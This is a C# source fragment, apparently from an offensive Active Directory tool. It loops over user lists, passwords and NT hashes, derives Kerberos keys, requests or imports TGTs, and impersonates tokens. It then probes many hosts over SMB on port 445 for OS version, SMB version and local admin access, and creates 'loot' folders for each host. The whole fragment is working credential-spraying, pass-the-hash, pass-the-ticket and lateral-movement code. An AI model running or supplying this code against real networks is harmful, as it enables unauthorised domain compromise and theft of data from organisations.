public static void SMB(string[] computernames, string module) { foreach (string computername in computernames) { try { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckSMBVersion(computername); Smb.CheckOsVersion(computername); Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } catch (Exception e) { Console.WriteLine("[-] {0}:445 - {1}", computername, e.ToString()); } } }
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags) { string ticketoutput; if (String.IsNullOrEmpty(ticket)) { foreach (string user in users) { var secrets = hashes.Length > 0 ? hashes : passwords; foreach (string secret in secrets) { string hash; if (passwords.Length > 0) { string salt = String.Format("{0}{1}", domain.ToUpper(), user); hash = Crypto.KerberosPasswordHash(encType, secret, salt); } else { hash = secret; } AToken.MakeToken("Fake", "Fake", "Fake"); Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] domain: {0}", domain)); Console.WriteLine(string.Format("[*] secret: {0}", secret)); ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] Ticket successfully imported!"); } else { Console.WriteLine("[-] Could not request TGT"); continue; } Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } AToken.RevertFromToken(); } } } else { AToken.MakeToken("Fake", "Fake", "Fake"); Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] Ticket: {0}", ticket)); ticketoutput = SecurityContext.ImportTicket(ticket); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] TGT imported successfully!"); } else { Console.WriteLine("[-] Could not import TGT"); return; } Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } AToken.RevertFromToken(); } }
public static void StartJob <T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument) { string[] passwords; if (typeof(T) == typeof(NTHash)) { passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null); foreach (string user in users) { foreach (string password in passwords) { Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] domain: {0}", domain)); Console.WriteLine(string.Format("[*] secret: {0}", password)); Console.WriteLine(); SetThreadToken(user, domain, password); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } } } } else if (typeof(T) == typeof(ClearText)) { passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null); foreach (string user in users) { foreach (string password in passwords) { Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] domain: {0}", domain)); Console.WriteLine(string.Format("[*] secret: {0}", password)); Console.WriteLine(); using (new Impersonator.Impersonation(domain, user, password)) { foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckSMBVersion(computername); Smb.CheckOsVersion(computername); Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } } } } } }